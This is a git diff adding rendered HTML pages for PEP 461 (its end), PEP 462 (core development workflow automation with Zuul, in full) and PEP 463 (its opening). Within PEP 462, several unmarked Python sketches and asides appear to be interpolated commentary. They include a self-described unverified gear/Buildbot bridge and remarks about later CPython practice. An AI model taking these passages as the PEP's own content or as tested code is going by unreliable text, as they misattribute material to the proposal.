  • what makes a number is fuzzy (float? Decimal? Fraction? some user type?)
  • allowing numbers would lead to ambiguity between numbers and textual
representations of numbers (3.14 vs ‘3.14’)
  • given the nature of wire formats, explicit is definitely better than implicit
+

%s is included as a synonym for %b for the sole purpose of making 2/3 code +bases easier to maintain. Python 3 only code should use %b.

+

Examples:

+
>>> b'%b' % b'abc'
+b'abc'
+
+>>> b'%b' % 'some string'.encode('utf8')
+b'some string'
+
+>>> b'%b' % 3.14
+Traceback (most recent call last):
+...
+TypeError: b'%b' does not accept 'float'
+
+>>> b'%b' % 'hello world!'
+Traceback (most recent call last):
+...
+TypeError: b'%b' does not accept 'str'
+
+
+

%a will give the equivalent of +repr(some_obj).encode('ascii', 'backslashreplace') on the interpolated +value. Use cases include developing a new protocol and writing landmarks +into the stream; debugging data going into an existing protocol to see if +the problem is the protocol itself or bad data; a fall-back for a serialization +format; or any situation where defining __bytes__ would not be appropriate +but a readable/informative representation is needed [6].

+

%r is included as a synonym for %a for the sole purpose of making 2/3
code bases easier to maintain. Python 3 only code should use %a [7].

+

Examples:

+
>>> b'%a' % 3.14
+b'3.14'
+
+>>> b'%a' % b'abc'
+b"b'abc'"
+
+>>> b'%a' % 'def'
+b"'def'"
+
+
+
+
+
+

Compatibility with Python 2

+

As noted above, %s and %r are being included solely to help ease +migration from, and/or have a single code base with, Python 2. This is +important as there are modules both in the wild and behind closed doors that +currently use the Python 2 str type as a bytes container, and hence +are using %s as a bytes interpolator.

+

However, %b and %a should be used in new, Python 3 only code, so %s +and %r will immediately be deprecated, but not removed from the 3.x series +[7].

+
+
+

Proposed variations

+

It has been proposed to automatically use .encode('ascii','strict') for +str arguments to %b.

+
    +
  • Rejected as this would lead to intermittent failures. Better to have the
operation always fail so the trouble-spot can be correctly fixed.
+

It has been proposed to have %b return the ascii-encoded repr when the +value is a str (b’%b’ % ‘abc’ –> b“‘abc’”).

+
    +
  • Rejected as this would lead to hard-to-debug failures far from the problem
site. Better to have the operation always fail so the trouble-spot can be
easily fixed.
+

Originally this PEP also proposed adding format-style formatting, but it was +decided that format and its related machinery were all strictly text (aka +str) based, and it was dropped.

+

Various new special methods were proposed, such as __ascii__, +__format_bytes__, etc.; such methods are not needed at this time, but can +be visited again later if real-world use shows deficiencies with this solution.

+

A competing PEP, PEP 460 Add binary interpolation and formatting, +also exists.

+
+
+

Objections

+

The objections raised against this PEP were mainly variations on two themes:

+
    +
  • the bytes and bytearray types are for pure binary data, with no
assumptions about encodings
  • offering %-interpolation that assumes an ASCII encoding will be an
attractive nuisance and lead us back to the problems of the Python 2
str/unicode text model
+

As was seen during the discussion, bytes and bytearray are also used +for mixed binary data and ASCII-compatible segments: file formats such as +dbf and pdf, network protocols such as ftp and email, etc.

+

bytes and bytearray already have several methods which assume an ASCII +compatible encoding. upper(), isalpha(), and expandtabs() to name +just a few. %-interpolation, with its very restricted mini-language, will not +be any more of a nuisance than the already existing methods.

+

Some have objected to allowing the full range of numeric formatting codes with +the claim that decimal alone would be sufficient. However, at least two +formats (dbf and pdf) make use of non-decimal numbers.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0461.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0462/index.html b/pep-0462/index.html
new file mode 100644
index 00000000000..574aa640f6e
--- /dev/null
+++ b/pep-0462/index.html
@@ -0,0 +1,755 @@
PEP 462 – Core development workflow automation for CPython | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 462 – Core development workflow automation for CPython

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Requires:
+
474
+
Created:
+
23-Jan-2014
+
Post-History:
+
25-Jan-2014, 27-Jan-2014, 01-Feb-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes investing in automation of several of the tedious, +time-consuming activities that are currently required for the core development +team to incorporate changes into CPython. This proposal is intended to +allow core developers to make more effective use of the time they have +available to contribute to CPython, which should also result in an improved +experience for other contributors that are reliant on the core team to get +their changes incorporated.

+
+
+

PEP Withdrawal

+

This PEP has been withdrawn by the author +in favour of the GitLab based proposal in PEP 507.

+

If anyone else would like to take over championing this PEP, contact the +core-workflow mailing list

+
+
+

Rationale for changes to the core development workflow

+

The current core developer workflow to merge a new feature into CPython +on a POSIX system “works” as follows:

+
    +
  1. If applying a change submitted to bugs.python.org by another user, first
check they have signed the PSF Contributor Licensing Agreement. If not,
request that they sign one before continuing with merging the change.
  2. Apply the change locally to a current checkout of the main CPython
repository (the change will typically have been discussed and reviewed
as a patch on bugs.python.org first, but this step is not currently
considered mandatory for changes originating directly from core
developers).
  3. Run the test suite locally, at least make test or
./python -m test (depending on system specs, this takes a few
minutes in the default configuration, but substantially longer if all
optional resources, like external network access, are enabled).
  4. Run make patchcheck to fix any whitespace issues and as a reminder
of other changes that may be needed (such as updating Misc/ACKS or
adding an entry to Misc/NEWS).
  5. Commit the change and push it to the main repository. If hg indicates
this would create a new head in the remote repository, run
hg pull --rebase (or an equivalent). Theoretically, you should
rerun the tests at this point, but it’s very tempting to skip that
step.
  6. After pushing, monitor the stable buildbots
for any new failures introduced by your change. In particular, developers
on POSIX systems will often break the Windows buildbots, and vice-versa.
Less commonly, developers on Linux or Mac OS X may break other POSIX
systems.
+

The steps required on Windows are similar, but the exact commands used +will be different.

+

Rather than being simpler, the workflow for a bug fix is more complicated +than that for a new feature! New features have the advantage of only being +applied to the default branch, while bug fixes also need to be considered +for inclusion in maintenance branches.

+
    +
  • If a bug fix is applicable to Python 2.7, then it is also separately +applied to the 2.7 branch, which is maintained as an independent head +in Mercurial
  • +
  • If a bug fix is applicable to the current 3.x maintenance release, then +it is first applied to the maintenance branch and then merged forward +to the default branch. Both branches are pushed to hg.python.org at the +same time.
  • +
+

Documentation patches are simpler than functional patches, but not +hugely so - the main benefit is only needing to check the docs build +successfully rather than running the test suite.

+

I would estimate that even when everything goes smoothly, it would still +take me at least 20-30 minutes to commit a bug fix patch that applies +cleanly. Given that it should be possible to automate several of these +tasks, I do not believe our current practices are making effective use +of scarce core developer resources.

+

There are many, many frustrations involved with this current workflow, and +they lead directly to some undesirable development practices.

+
    +
  • Much of this overhead is incurred for each patch applied. This encourages large commits, rather than small isolated changes. The time required to commit a 500 line feature is essentially the same as that needed to commit a 1 line bug fix - the additional time needed for the larger change appears in any preceding review rather than as part of the commit process.
  • +
  • The additional overhead of working on applying bug fixes creates an +additional incentive to work on new features instead, and new features +are already inherently more interesting to work on - they don’t need +workflow difficulties giving them a helping hand!
  • +
  • Getting a preceding review on bugs.python.org is additional work, +creating an incentive to commit changes directly, increasing the reliance +on post-review on the python-checkins mailing list.
  • +
  • Patches on the tracker that are complete, correct and ready to merge may +still languish for extended periods awaiting a core developer with the +time to devote to getting it merged.
  • +
  • The risk of push races (especially when pushing a merged bug fix) creates +a temptation to skip doing full local test runs (especially after a push +race has already been encountered once), increasing the chance of +breaking the buildbots.
  • +
  • The buildbots are sometimes red for extended periods, introducing errors +into local test runs, and also meaning that they sometimes fail to serve +as a reliable indicator of whether or not a patch has introduced cross +platform issues.
  • +
  • Post-conference development sprints are a nightmare, as they collapse +into a mire of push races. It’s tempting to just leave patches on the +tracker until after the sprint is over and then try to clean them up +afterwards.
  • +
+

There are also many, many opportunities for core developers to make +mistakes that inconvenience others, both in managing the Mercurial branches +and in breaking the buildbots without being in a position to fix them +promptly. This both makes the existing core development team cautious in +granting new developers commit access, as well as making those new +developers cautious about actually making use of their increased level of +access.

+

There are also some incidental annoyances (like keeping the NEWS file up to date) that will necessarily be addressed as part of this proposal.

+

One of the most critical resources of a volunteer-driven open source project +is the emotional energy of its contributors. The current approach to change +incorporation doesn’t score well on that front for anyone:

+
    +
  • For core developers, the branch wrangling for bug fixes is delicate and +easy to get wrong. Conflicts on the NEWS file and push races when +attempting to upload changes add to the irritation of something most of +us aren’t being paid to spend time on (and for those that are, contributing +to CPython is likely to be only one of our responsibilities). The time we +spend actually getting a change merged is time we’re not spending coding +additional changes, writing or updating documentation or reviewing +contributions from others.
  • +
  • Red buildbots make life difficult for other developers (since a local +test failure may not be due to anything that developer did), release +managers (since they may need to enlist assistance cleaning up test +failures prior to a release) and for the developers themselves (since +it creates significant pressure to fix any failures we inadvertently +introduce right now, rather than at a more convenient time, as well +as potentially making hg bisect more difficult to use if +hg annotate isn’t sufficient to identify the source of a new failure).
  • +
  • For other contributors, a core developer spending time actually getting +changes merged is a developer that isn’t reviewing and discussing patches +on the issue tracker or otherwise helping others to contribute effectively. +It is especially frustrating for contributors that are accustomed to the +simplicity of a developer just being able to hit “Merge” on a pull +request that has already been automatically tested in the project’s CI +system (which is a common workflow on sites like GitHub and BitBucket), or +where the post-review part of the merge process is fully automated (as is +the case for OpenStack).
  • +
+
+
+

Current Tools

+

The following tools are currently used to manage various parts of the +CPython core development workflow.

+
    +
  • Mercurial (hg.python.org) for version control
  • +
  • Roundup (bugs.python.org) for issue tracking
  • +
  • Rietveld (also hosted on bugs.python.org) for code review
  • +
  • Buildbot (buildbot.python.org) for automated testing
  • +
+

This proposal suggests replacing the use of Rietveld for code review with +the more full-featured Kallithea-based forge.python.org service proposed in +PEP 474. Guido has indicated that the original Rietveld implementation was +primarily intended as a public demonstration application for Google App +Engine, and switching to Kallithea will address some of the issues with +identifying intended target branches that arise when working with patch files +on Roundup and the associated reviews in the integrated Rietveld instance.

+

It also suggests the addition of new tools in order to automate +additional parts of the workflow, as well as a critical review of the +remaining tools to see which, if any, may be candidates for replacement.

+
+
+

Proposal

+

The essence of this proposal is that CPython aim to adopt a “core reviewer” +development model, similar to that used by the OpenStack project.

+

The workflow problems experienced by the CPython core development team are not unique. The OpenStack infrastructure team have come up with a well-designed automated workflow that ensures:

+
    +
  • once a patch has been reviewed, further developer involvement is needed +only if the automated tests fail prior to merging
  • +
  • patches never get merged without being tested relative to the current +state of the branch
  • +
  • the main development branch always stays green. Patches that do not pass +the automated tests do not get merged
  • +
+

If a core developer wants to tweak a patch prior to merging, they download +it from the review tool, modify and upload it back to the review tool +rather than pushing it directly to the source code repository.

+

The core of this workflow is implemented using a tool called Zuul, a +Python web service created specifically for the OpenStack project, but +deliberately designed with a plugin based trigger and action system to make +it easier to adapt to alternate code review systems, issue trackers and +CI systems. James Blair of the OpenStack infrastructure team provided +an excellent overview of Zuul at linux.conf.au 2014.

+

While Zuul handles several workflows for OpenStack, the specific one of +interest for this PEP is the “merge gating” workflow.

+

For this workflow, Zuul is configured to monitor the Gerrit code review +system for patches which have been marked as “Approved”. Once it sees +such a patch, Zuul takes it, and combines it into a queue of “candidate +merges”. It then creates a pipeline of test runs that execute in parallel in +Jenkins (in order to allow more than 24 commits a day when a full test run +takes the better part of an hour), and are merged as they pass (and as all +the candidate merges ahead of them in the queue pass). If a patch fails the +tests, Zuul takes it out of the queue, cancels any test runs after that patch in +the queue, and rebuilds the queue without the failing patch.

+
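As a rough mental model of that gating loop, here is a toy sequential sketch (not Zuul's actual code; merge_gate, run_tests and merge are invented names for illustration):

from collections import deque

def merge_gate(approved, run_tests, merge):
    """Test each approved change against the current branch state;
    merge it if green, drop it from the queue if it fails."""
    queue = deque(approved)
    while queue:
        change = queue.popleft()
        if run_tests(change):          # full test run on the candidate merge
            merge(change)              # only passing changes ever land
        else:
            print('rejected, main branch stays green:', change)

merge_gate(['bugfix-123', 'feature-456'],
           run_tests=lambda change: change != 'feature-456',
           merge=lambda change: print('merged:', change))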

If a developer looks at a test which failed on merge and determines that it +was due to an intermittent failure, they can then resubmit the patch for +another attempt at merging.

+

To adapt this process to CPython, it should be feasible to have Zuul monitor +Kallithea for approved pull requests (which may require a feature addition in +Kallithea), submit them to Buildbot for testing on the stable buildbots, and +then merge the changes appropriately in Mercurial. This idea poses a few +technical challenges, which have their own section below.

+

For CPython, I don’t believe we will need to take advantage of Zuul’s +ability to execute tests in parallel (certainly not in the initial +iteration - if we get to a point where serial testing of patches by the +merge gating system is our primary bottleneck rather than having the +people we need in order to be able to review and approve patches, then +that will be a very good day).

+

However, the merge queue itself is a very powerful concept that should +directly address several of the issues described in the Rationale above.

+
+
+

Deferred Proposals

+

The OpenStack team also use Zuul to coordinate several other activities:

+
    +
  • Running preliminary “check” tests against patches posted to Gerrit.
  • +
  • Creation of updated release artefacts and republishing documentation when +changes are merged
  • +
  • The Elastic recheck feature that uses ElasticSearch in conjunction with +a spam filter to monitor test output and suggest the specific intermittent +failure that may have caused a test to fail, rather than requiring users +to search logs manually
  • +
+

While these are possibilities worth exploring in the future (and one of the +possible benefits I see to seeking closer coordination with the OpenStack +Infrastructure team), I don’t see them as offering quite the same kind of +fundamental workflow improvement that merge gating appears to provide.

+

However, if we find we are having too many problems with intermittent test +failures in the gate, then introducing the “Elastic recheck” feature may +need to be considered as part of the initial deployment.

+
+
+

Suggested Variants

+

Terry Reedy has suggested doing an initial filter which specifically looks +for approved documentation-only patches (~700 of the 4000+ open CPython +issues are pure documentation updates). This approach would avoid several +of the issues related to flaky tests and cross-platform testing, while +still allowing the rest of the automation flows to be worked out (such as +how to push a patch into the merge queue).

+

The key downside to this approach is that Zuul wouldn’t have complete +control of the merge process as it usually expects, so there would +potentially be additional coordination needed around that.

+

It may be worth keeping this approach as a fallback option if the initial +deployment proves to have more trouble with test reliability than is +anticipated.

+

It would also be possible to tweak the merge gating criteria such that it +doesn’t run the test suite if it detects that the patch hasn’t modified any +files outside the “Docs” tree, and instead only checks that the documentation +builds without errors.

+
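That check is cheap to express; a minimal sketch, assuming the gate can see the list of paths a patch touches (in CPython's layout the documentation lives under Doc/):

def docs_only(changed_paths):
    # Skip the full test suite and just build the docs when a patch
    # touches nothing outside the documentation tree.
    return all(path.startswith('Doc/') for path in changed_paths)

assert docs_only(['Doc/library/os.rst'])
assert not docs_only(['Doc/library/os.rst', 'Lib/os.py'])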

As yet another alternative, it may be reasonable to move some parts of the +documentation (such as the tutorial and the HOWTO guides) out of the main +source repository and manage them using the simpler pull request based model +described in PEP 474.

+
+
+

Perceived Benefits

+

The benefits of this proposal accrue most directly to the core development +team. First and foremost, it means that once we mark a patch as “Approved” +in the updated code review system, we’re usually done. The extra 20-30 +minutes (or more) of actually applying the patch, running the tests and +merging it into Mercurial would all be orchestrated by Zuul. Push races +would also be a thing of the past - if lots of core developers are +approving patches at a sprint, then that just means the queue gets +deeper in Zuul, rather than developers getting frustrated trying to +merge changes and failing. Test failures would still happen, but they +would result in the affected patch being removed from the merge queue, +rather than breaking the code in the main repository.

+

With the bulk of the time investment moved to the review process, this +also encourages “development for reviewability” - smaller, easier to review +patches, since the overhead of running the tests multiple times will be +incurred by Zuul rather than by the core developers.

+

However, removing this time sink from the core development team should also +improve the experience of CPython development for other contributors, as it +eliminates several of the opportunities for patches to get “dropped on the +floor”, as well as increasing the time core developers are likely to have +available for reviewing contributed patches.

+

Another example of benefits to other contributors is that when a sprint +aimed primarily at new contributors is running with just a single core +developer present (such as the sprints at PyCon AU for the last +few years), the merge queue would allow that developer to focus more of +their time on reviewing patches and helping the other contributors at the +sprint, since accepting a patch for inclusion would now be a single click +in the Kallithea UI, rather than the relatively time-consuming process that +it is currently. Even when multiple core developers are present, it is +better to enable them to spend their time and effort on interacting with +the other sprint participants than it is on things that are sufficiently +mechanical that a computer can (and should) handle them.

+

With most of the ways to make a mistake when committing a change +automated out of existence, there are also substantially fewer new things to +learn when a contributor is nominated to become a core developer. This +should have a dual benefit, both in making the existing core developers more +comfortable with granting that additional level of responsibility, and in +making new contributors more comfortable with exercising it.

+

Finally, a more stable default branch in CPython makes it easier for +other Python projects to conduct continuous integration directly against the +main repo, rather than having to wait until we get into the release +candidate phase of a new release. At the moment, setting up such a system +isn’t particularly attractive, as it would need to include an additional +mechanism to wait until CPython’s own Buildbot fleet indicated that the +build was in a usable state. With the proposed merge gating system, the +trunk always remains usable.

+
+
+

Technical Challenges

+

Adapting Zuul from the OpenStack infrastructure to the CPython +infrastructure will at least require the development of additional +Zuul trigger and action plugins, and may require additional development +in some of our existing tools.

+
+

Kallithea vs Gerrit

+

Kallithea does not currently include a voting/approval feature that is +equivalent to Gerrit’s. For CPython, we wouldn’t need anything as +sophisticated as Gerrit’s voting system - a simple core-developer-only +“Approved” marker to trigger action from Zuul should suffice. The +core-developer-or-not flag is available in Roundup, as is the flag +indicating whether or not the uploader of a patch has signed a PSF +Contributor Licensing Agreement, which may require further development to +link contributor accounts between the Kallithea instance and Roundup.

+

Some of the existing Zuul triggers work by monitoring for particular comments +(in particular, recheck/reverify comments to ask Zuul to try merging a +change again if it was previously rejected due to an unrelated intermittent +failure). We will likely also want similar explicit triggers for Kallithea.

+
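A hedged sketch of such a trigger (the comment pattern mirrors Zuul's recheck/reverify convention; the event dictionary shape and the enqueue hook are assumptions for illustration):

import re

RETRY = re.compile(r'^\s*(recheck|reverify)\b', re.IGNORECASE)

def on_pull_request_comment(event, enqueue):
    # Re-queue a previously rejected change when a developer judges the
    # earlier failure to have been an unrelated intermittent one.
    if RETRY.match(event.get('comment', '')):
        enqueue(event['change_id'])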

The current Zuul plugins for Gerrit work by monitoring the Gerrit activity +stream for particular events. If Kallithea has no equivalent, we will need +to add something suitable for the events we would like to trigger on.

+

There would also be development effort needed to create a Zuul plugin +that monitors Kallithea activity rather than Gerrit.

+
+
+

Mercurial vs Gerrit/git

+

Gerrit uses git as the actual storage mechanism for patches, and automatically handles merging of approved patches. By contrast, Kallithea uses the RhodeCode-created vcs library as an abstraction layer over specific DVCS implementations (with Mercurial and git backends currently available).

+

Zuul is also directly integrated with git for patch manipulation - as far +as I am aware, this part of the design currently isn’t pluggable. However, +at PyCon US 2014, the Mercurial core developers at the sprints expressed +some interest in collaborating with the core development team and the Zuul +developers on enabling the use of Zuul with Mercurial in addition to git. +As Zuul is itself a Python application, migrating it to use the same DVCS +abstraction library as RhodeCode and Kallithea may be a viable path towards +achieving that.

+
+
+

Buildbot vs Jenkins

+

Zuul’s interaction with the CI system is also pluggable, using Gearman +as the preferred interface. +Accordingly, adapting the CI jobs to run in Buildbot rather than Jenkins +should just be a matter of writing a Gearman client that can process the +requests from Zuul and pass them on to the Buildbot master. Zuul uses the +pure Python gear client library to +communicate with Gearman, and this library should also be useful to handle +the Buildbot side of things.

+
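A sketch of what that bridge might look like, based on my reading of the gear worker API (treat the calls as assumptions to verify; request_buildbot_run is a hypothetical helper standing in for a forced-build request to the Buildbot master):

import gear

def serve_gate_jobs(gearman_server, request_buildbot_run):
    worker = gear.Worker('buildbot-bridge')
    worker.addServer(gearman_server)           # assumed Gearman server address
    worker.registerFunction('build:cpython-gate')
    while True:
        job = worker.getJob()                  # block until Zuul submits a job
        ok = request_buildbot_run(job.arguments)   # hypothetical forced build
        if ok:
            job.sendWorkComplete(b'SUCCESS')
        else:
            job.sendWorkFail()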

Note that, in the initial iteration, I am proposing that we do not +attempt to pipeline test execution. This means Zuul would be running in +a very simple mode where only the patch at the head of the merge queue +is being tested on the Buildbot fleet, rather than potentially testing +several patches in parallel. I am picturing something equivalent to +requesting a forced build from the Buildbot master, and then waiting for +the result to come back before moving on to the second patch in the queue.

+

If we ultimately decide that this is not sufficient, and we need to start +using the CI pipelining features of Zuul, then we may need to look at moving +the test execution to dynamically provisioned cloud images, rather than +relying on volunteer maintained statically provisioned systems as we do +currently. The OpenStack CI infrastructure team are exploring the idea of +replacing their current use of Jenkins masters with a simpler pure Python +test runner, so if we find that we can’t get Buildbot to effectively +support the pipelined testing model, we’d likely participate in that +effort rather than setting up a Jenkins instance for CPython.

+

In this case, the main technical risk would be a matter of ensuring we +support testing on platforms other than Linux (as our stable buildbots +currently cover Windows, Mac OS X, FreeBSD and OpenIndiana in addition to a +couple of different Linux variants).

+

In such a scenario, the Buildbot fleet would still have a place in doing +“check” runs against the master repository (either periodically or for +every commit), even if it did not play a part in the merge gating process. +More unusual configurations (such as building without threads, or without +SSL/TLS support) would likely still be handled that way rather than being +included in the gate criteria (at least initially, anyway).

+
+
+

Handling of maintenance branches

+

The OpenStack project largely leaves the question of maintenance branches +to downstream vendors, rather than handling it directly. This means there +are questions to be answered regarding how we adapt Zuul to handle our +maintenance branches.

+

Python 2.7 can be handled easily enough by treating it as a separate patch +queue. This would be handled natively in Kallithea by submitting separate +pull requests in order to update the Python 2.7 maintenance branch.

+

The Python 3.x maintenance branches are potentially more complicated. My +current recommendation is to simply stop using Mercurial merges to manage +them, and instead treat them as independent heads, similar to the Python +2.7 branch. Separate pull requests would need to be submitted for the active +Python 3 maintenance branch and the default development branch. The +downside of this approach is that it increases the risk that a fix is merged +only to the maintenance branch without also being submitted to the default +branch, so we may want to design some additional tooling that ensures that +every maintenance branch pull request either has a corresponding default +branch pull request prior to being merged, or else has an explicit disclaimer +indicating that it is only applicable to that branch and doesn’t need to be +ported forward to later branches.

+
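One way such tooling could work, sketched against an invented pull-request record shape (Kallithea's actual data model may differ):

def may_merge_maintenance_pr(pr, open_prs):
    # A maintenance-branch PR may merge only if a default-branch PR exists
    # for the same issue, or if it explicitly claims to be branch-specific.
    if pr['branch'] == 'default':
        return True
    if 'maintenance-only' in pr.get('labels', ()):
        return True
    return any(other['branch'] == 'default' and other['issue'] == pr['issue']
               for other in open_prs)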

Such an approach has the benefit of adjusting relatively cleanly to the +intermittent periods where we have two active Python 3 maintenance branches.

+

This issue does suggest some potential user interface ideas for Kallithea, +where it may be desirable to be able to clone a pull request in order to be +able to apply it to a second branch.

+
+
+

Handling of security branches

+

For simplicity’s sake, I would suggest leaving the handling of +security-fix only branches alone: the release managers for those branches +would continue to backport specific changes manually. The only change is +that they would be able to use the Kallithea pull request workflow to do the +backports if they would like others to review the updates prior to merging +them.

+
+
+

Handling of NEWS file updates

+

Our current approach to handling NEWS file updates regularly results in +spurious conflicts when merging bug fixes forward from an active maintenance +branch to a later branch.

+

Issue #18967 discusses some possible improvements in that area, which would be beneficial regardless of whether or not we adopt Zuul as a workflow automation tool.

+
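One improvement discussed in that area (and roughly the shape CPython later adopted with the blurb tool) is to keep each entry in its own file and only assemble the combined NEWS file at release time, so merges never touch a shared file; a minimal sketch, assuming a Misc/NEWS.d snippet directory:

from pathlib import Path

def assemble_news(snippet_dir='Misc/NEWS.d', output='Misc/NEWS'):
    # Each change adds one small file; only the release process writes
    # the combined file, so bug-fix merges cannot conflict on it.
    snippets = sorted(Path(snippet_dir).glob('*.rst'), reverse=True)
    Path(output).write_text('\n'.join(p.read_text() for p in snippets))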
+
+

Stability of “stable” Buildbot slaves

+

Instability of the nominally stable buildbots has a substantially larger impact under this proposal. We would need to ensure we’re genuinely happy with each of those systems gating merges to the development branches, or else move them to “unstable” status.

+
+
+

Intermittent test failures

+

Some tests, especially timing tests, exhibit intermittent failures on the +existing Buildbot fleet. In particular, test systems running as VMs may +sometimes exhibit timing failures when the VM host is under higher than +normal load.

+

The OpenStack CI infrastructure includes a number of additional features to +help deal with intermittent failures, the most basic of which is simply +allowing developers to request that merging a patch be tried again when the +original failure appears to be due to a known intermittent failure (whether +that intermittent failure is in OpenStack itself or just in a flaky test).

+

The more sophisticated Elastic recheck feature may be worth considering, +especially since the output of the CPython test suite is substantially +simpler than that from OpenStack’s more complex multi-service testing, and +hence likely even more amenable to automated analysis.

+
+
+

Custom Mercurial client workflow support

+

One useful part of the OpenStack workflow is the “git review” plugin, +which makes it relatively easy to push a branch from a local git clone up +to Gerrit for review.

+

PEP 474 mentions a draft custom Mercurial +extension +that automates some aspects of the existing CPython core development workflow.

+

As part of this proposal, that custom extension would be extended to work +with the new Kallithea based review workflow in addition to the legacy +Roundup/Rietveld based review workflow.

+
+
+
+

Social Challenges

+

The primary social challenge here is getting the core development team to +change their practices. However, the tedious-but-necessary steps that are +automated by the proposal should create a strong incentive for the +existing developers to go along with the idea.

+

I believe three specific features may be needed to assure existing +developers that there are no downsides to the automation of this workflow:

+
    +
  • Only requiring approval from a single core developer to incorporate a +patch. This could be revisited in the future, but we should preserve the +status quo for the initial rollout.
  • +
  • Explicitly stating that core developers remain free to approve their own +patches, except during the release candidate phase of a release. This +could be revisited in the future, but we should preserve the status quo +for the initial rollout.
  • +
  • Ensuring that at least release managers have a “merge it now” capability +that allows them to force a particular patch to the head of the merge +queue. Using a separate clone for release preparation may be sufficient +for this purpose. Longer term, automatic merge gating may also allow for +more automated preparation of release artefacts as well.
  • +
+
+
+

Practical Challenges

+

The PSF runs its own directly and indirectly sponsored workflow infrastructure primarily due to past experience with unacceptably poor performance and inflexibility of infrastructure provided for free to the general public. CPython development was originally hosted on SourceForge, with source control moved to self-hosting when SF was both slow to offer Subversion support and suffering from CVS performance issues (see PEP 347), while issue tracking later moved to the open source Roundup issue tracker on dedicated sponsored hosting (from Upfront Systems), due to a combination of both SF performance issues and general usability issues with the SF tracker at the time (the outcome and process for the new tracker selection were captured on the python.org wiki rather than in a PEP).

+

Accordingly, proposals that involve setting ourselves up for “SourceForge +usability and reliability issues, round two” will face significant +opposition from at least some members of the CPython core development team +(including the author of this PEP). This proposal respects that history by +recommending only tools that are available for self-hosting as sponsored +or PSF funded infrastructure, and are also open source Python projects that +can be customised to meet the needs of the CPython core development team.

+

However, for this proposal to be a success (if it is accepted), we need to +understand how we are going to carry out the necessary configuration, +customisation, integration and deployment work.

+

The last attempt at adding a new piece to the CPython support infrastructure +(speed.python.org) has unfortunately foundered due to the lack of time to +drive the project from the core developers and PSF board members involved, +and the difficulties of trying to bring someone else up to speed to lead +the activity (the hardware donated to that project by HP is currently in +use to support PyPy instead, but the situation highlights some +of the challenges of relying on volunteer labour with many other higher +priority demands on their time to steer projects to completion).

+

Even ultimately successful past projects, such as the source control +migrations from CVS to Subversion and from Subversion to Mercurial, the +issue tracker migration from SourceForge to Roundup, the code review +integration between Roundup and Rietveld and the introduction of the +Buildbot continuous integration fleet, have taken an extended period of +time as volunteers worked their way through the many technical and social +challenges involved.

+

Fortunately, as several aspects of this proposal and PEP 474 align with +various workflow improvements under consideration for Red Hat’s +Beaker open source hardware integration +testing system and other work-related projects, I have arranged to be able +to devote ~1 day a week to working on CPython infrastructure projects.

+

Together with Rackspace’s existing contributions to maintaining the +pypi.python.org infrastructure, I personally believe this arrangement is +indicative of a more general recognition amongst CPython redistributors and +major users of the merit in helping to sustain upstream infrastructure +through direct contributions of developer time, rather than expecting +volunteer contributors to maintain that infrastructure entirely in their +spare time or funding it indirectly through the PSF (with the additional +management overhead that would entail). I consider this a positive trend, and +one that I will continue to encourage as best I can.

+
+
+

Open Questions

+

Pretty much everything in the PEP. Do we want to adopt merge gating and +Zuul? How do we want to address the various technical challenges? +Are the Kallithea and Zuul development communities open to the kind +of collaboration that would be needed to make this effort a success?

+

While I’ve arranged to spend some of my own work time on this, do we want to +approach the OpenStack Foundation for additional assistance, since +we’re a key dependency of OpenStack itself, Zuul is a creation of the +OpenStack infrastructure team, and the available development resources for +OpenStack currently dwarf those for CPython?

+

Are other interested folks working for Python redistributors and major users +also in a position to make a business case to their superiors for investing +developer time in supporting this effort?

+
+
+

Next Steps

+

If pursued, this will be a follow-on project to the Kallithea-based +forge.python.org proposal in PEP 474. Refer to that PEP for more details +on the discussion, review and proof-of-concept pilot process currently +under way.

+
+
+

Acknowledgements

+

Thanks to Jesse Noller, Alex Gaynor and James Blair for providing valuable +feedback on a preliminary draft of this proposal, and to James and Monty +Taylor for additional technical feedback following publication of the +initial draft.

+

Thanks to Bradley Kuhn, Mads Kiilerich and other Kallithea developers for the discussions around PEP 474 that led to a significant revision of this proposal to be based on using Kallithea for the review component rather than the existing Rietveld installation.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0462.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0463/index.html b/pep-0463/index.html new file mode 100644 index 00000000000..fa52dd3c643 --- /dev/null +++ b/pep-0463/index.html @@ -0,0 +1,980 @@ + PEP 463 – Exception-catching expressions | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 463 – Exception-catching expressions

+
+
Author:
+
Chris Angelico <rosuav at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
15-Feb-2014
+
Python-Version:
+
3.5
+
Post-History:
+
20-Feb-2014, 16-Feb-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

From https://mail.python.org/pipermail/python-dev/2014-March/133118.html:

+

“”” +I want to reject this PEP. I think the proposed syntax is acceptable given +the desired semantics, although it’s still a bit jarring. It’s probably no +worse than the colon used with lambda (which echoes the colon used in a def +just like the colon here echoes the one in a try/except) and definitely +better than the alternatives listed.

+

But the thing I can’t get behind are the motivation and rationale. I don’t +think that e.g. dict.get() would be unnecessary once we have except +expressions, and I disagree with the position that EAFP is better than +LBYL, or “generally recommended” by Python. (Where do you get that? From +the same sources that are so obsessed with DRY they’d rather introduce a +higher-order-function than repeat one line of code? :-)

+

This is probably the most you can get out of me as far as a pronouncement. +Given that the language summit is coming up I’d be happy to dive deeper in +my reasons for rejecting it there (if there’s demand).

+

I do think that (apart from never explaining those dreadful acronyms :-) +this was a well-written and well-researched PEP, and I think you’ve done a +great job moderating the discussion, collecting objections, reviewing +alternatives, and everything else that is required to turn a heated debate +into a PEP. Well done Chris (and everyone who helped), and good luck with +your next PEP! +“””

+
+
+

Abstract

+

Just as PEP 308 introduced a means of value-based conditions in an +expression, this system allows exception-based conditions to be used +as part of an expression.

+
+
+

Motivation

+

A number of functions and methods have parameters which will cause +them to return a specified value instead of raising an exception. The +current system is ad-hoc and inconsistent, and requires that each +function be individually written to have this functionality; not all +support this.

+
    +
  • dict.get(key, default) - second positional argument in place of +KeyError
  • +
